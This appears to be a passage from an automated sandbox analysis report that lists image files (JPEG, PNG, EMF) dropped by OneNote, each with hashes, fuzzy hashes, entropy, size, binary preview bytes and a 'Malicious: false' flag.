                                                                                                        SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                        SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):27862
                                                                                                        Entropy (8bit):7.238903610770013
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                        MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                        SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                        SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                        SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):977
                                                                                                        Entropy (8bit):7.231269197132181
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                        MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                        SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                        SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                        SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):34299
                                                                                                        Entropy (8bit):7.247541176493898
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                        MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                        SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                        SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                        SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10056
                                                                                                        Entropy (8bit):7.956064700093514
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                        MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                        SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                        SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                        SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):84097
                                                                                                        Entropy (8bit):7.78862495530604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                        MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                        SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                        SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                        SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64118
                                                                                                        Entropy (8bit):7.742974333356952
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                        MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                        SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                        SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                        SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65998
                                                                                                        Entropy (8bit):7.671031449942883
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                        MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                        SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                        SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                        SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32656
                                                                                                        Entropy (8bit):3.9517299510231485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                        MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                        SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                        SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                        SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                        Malicious:false
                                                                                                        Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12824
                                                                                                        Entropy (8bit):7.974776104184905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                        MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                        SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                        SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                        SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32656
                                                                                                        Entropy (8bit):3.9517299510231485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                        MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                        SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                        SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                        SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                        Malicious:false
                                                                                                        Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12824
                                                                                                        Entropy (8bit):7.974776104184905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                        MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                        SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                        SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                        SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32656
                                                                                                        Entropy (8bit):3.9517299510231485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                        MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                        SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                        SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                        SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                        Malicious:false
                                                                                                        Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12824
                                                                                                        Entropy (8bit):7.974776104184905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                        MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                        SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                        SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                        SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):39010
                                                                                                        Entropy (8bit):7.362726513389497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                        MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                        SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                        SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                        SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25622
                                                                                                        Entropy (8bit):7.058784902089801
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                        MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                        SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                        SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                        SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                        Malicious:false
